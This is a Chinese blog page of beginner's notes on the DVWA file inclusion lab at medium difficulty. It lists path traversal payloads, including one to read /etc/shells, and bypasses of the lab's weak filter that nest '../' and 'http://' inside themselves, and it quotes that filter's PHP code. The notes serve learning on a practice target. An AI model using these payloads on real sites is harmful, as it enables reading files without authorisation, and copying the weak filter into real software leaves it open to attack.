搜索
5.File Inclusion(Medium)——小白笔记——文件包含漏洞
统计
  • 建站日期:2015-11-11
  • 文章总数:2410 篇
  • 评论总数:0 条
  • 分类总数:38 个
  • 最后更新:2022年07月24日

5.File Inclusion(Medium)——小白笔记——文件包含漏洞

纸飞机-JAVA追梦 / / 0 评论 / 175 阅读 /0 赞
作者有点忙,还没写简介
本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

0x01:文件包含(Medium)

1.本地

1.绝对路径:?page=/etc/shells            //没有被过滤
3.相对路径:?page=../../../dvwa/php.ini        //被过滤
4.相对路径绕过:?page=..././..././..././dvwa/php.ini            //在每个../前面添加一个. 以及后面添加一个./         //双写绕过

2.远程:

1.远程文件包含:?page=http://127.0.0.1/fit/f1.txt        //被过滤
2.远程双写绕过:?page=hhttp://ttp://127.0.0.1/fit/f1.txt        //双写绕过

2.上源码: File :Inclusion Source

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?> 

str_replace函数过滤了什么?
1.http://和https://被替换为空
2.../和..\被替换为空

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/103014949
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

随机推荐

7.100个渗透测试实战#7(Biilu_b0x)

求最小公倍数的三种方法以及对求最大公因数的补充 C语言从入门到入土(入门篇)(算法篇p4)

关于wordpress安装插件出现&quot;要执行请求的操作,WordPress需要访问您网页服务器的权限&quot;解决办法

不允许创建临时变量,交换两个整数的内容的奇淫技巧 C语言从入门到入土(进阶篇)(算法篇p6)

发表评论

成为第一个评论的人

热门文章

1
Go语言实现MSF免杀上线、思路可转换自己生成马进行绕过免杀!
1.3k 阅读 ,
2
免杀 编译shellcode进行绕过杀软操作!
1.1k 阅读 ,
3
远控免杀系列文章与工具
1k 阅读 ,
4
WEBSEC-信息收集--第一篇
920 阅读 ,

标签TAG

最近回复

我要留言